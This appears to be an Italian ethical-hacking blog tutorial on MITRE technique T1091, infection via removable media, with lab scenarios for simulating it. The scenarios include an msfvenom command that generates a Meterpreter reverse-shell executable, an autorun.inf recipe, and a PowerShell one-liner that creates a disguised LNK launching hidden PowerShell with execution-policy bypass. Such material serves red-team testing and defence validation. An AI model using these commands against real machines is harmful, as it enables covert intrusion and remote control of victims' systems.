Infezione via Supporti Rimovibili: Replication Through Removable Media (T1091)

La tecnica T1091 descrive la capacità degli avversari di propagare codice malevolo attraverso supporti rimovibili — chiavette USB, hard disk esterni, smartphone collegati via USB e perfino cavi di ricarica modificati. Il meccanismo sfrutta la fiducia implicita che utenti e sistemi operativi ripongono nei dispositivi fisici: una volta inserito il supporto, funzionalità come Autorun o la semplice curiosità dell'utente fanno il resto.

La tecnica opera trasversalmente su due tattiche distinte. Come vettore di Initial Access (TA0001), permette di raggiungere reti fisicamente isolate (air-gapped) o ambienti con controlli perimetrali stringenti dove il phishing non arriverebbe. Come strumento di Lateral Movement (TA0008), consente la propagazione tra macchine interne tramite supporti condivisi, modificando eseguibili già presenti sul dispositivo o depositandovi malware camuffato da documenti legittimi.

I numeri del framework parlano chiaro: 8 gruppi APT documentati, 20 famiglie malware e 3 mitigazioni dedicate. La superficie d'attacco è amplificata dal fatto che molte organizzazioni non impongono restrizioni hardware sulle porte USB, e le policy di Autorun restano abilitate in configurazioni di default. L'impatto è particolarmente severo in ambienti OT/ICS e infrastrutture critiche dove l'air-gap è la principale — e talvolta unica — misura di sicurezza perimetrale.


Simulare T1091 in laboratorio richiede di riprodurre due scenari distinti: la propagazione automatica via Autorun e l'infezione tramite file camuffati che ingannano l'utente. Entrambi sono rilevanti per valutare se i controlli dell'organizzazione resistono alla minaccia fisica.

Scenario 1 — Autorun classico. Su una chiavetta USB formattata, crea un file autorun.inf che punta a un payload. In ambiente di test con Windows 7 o sistemi legacy dove Autorun è ancora abilitato, il principio è semplice: il file .inf istruisce il sistema a eseguire un binario al montaggio del drive. Su sistemi moderni (Windows 10/11) Autorun per dispositivi USB è disabilitato di default, ma AutoPlay può ancora presentare all'utente opzioni ingannevoli. Per generare un payload di test puoi usare msfvenom (open source, parte di Metasploit Framework):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_LAB> LPORT=4444 -f exe -o setup.exe

Copia il binario e l'autorun.inf sulla chiavetta. L'autorun.inf minimo contiene la sezione [autorun] con la direttiva open=setup.exe e opzionalmente un'icona personalizzata per rendere il drive più credibile.

Scenario 2 — LNK weaponizzato. Questo approccio replica la tecnica documentata per Gamaredon Group, che crea file LNK su tutte le unità rimovibili. Con PowerShell puoi generare un collegamento che esegue un comando nascosto:

$ws = New-Object -ComObject WScript.Shell; $sc = $ws.CreateShortcut("E:\Report_Q4.lnk"); $sc.TargetPath = "powershell.exe"; $sc.Arguments = "-ep bypass -windowstyle hidden -file E:\payload.ps1"; $sc.IconLocation = "shell32.dll,1"; $sc.Save()

Il file LNK appare come un documento, ma al doppio clic avvia PowerShell in modalità nascosta. Nascondi il payload reale con l'attributo hidden: attrib +h +s E:\payload.ps1.

Scenario 3 — Rubber Ducky e BadUSB. Per simulare l'approccio di FIN7 (che ha spedito fisicamente chiavette USB malevole), usa un USB Rubber Ducky (a pagamento, Hak5) o una board DigiSpark ATtiny85 (a pagamento, costo minimo). Questi dispositivi emulano una tastiera HID e digitano comandi predefiniti in pochi secondi. L'IDE Arduino (open source) permette di programmare la DigiSpark con script DuckyScript-like. Per un approccio software-only, USBHarpoon è un proof-of-concept documentato che dimostra l'attacco via cavo USB modificato.

Validazione difese. Durante l'engagement, verifica se le ASR rules di Windows Defender bloccano l'esecuzione da drive rimovibili e se le GPO impediscono il montaggio di dispositivi di massa USB non autorizzati. Documenta ogni bypass come finding critico.


Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo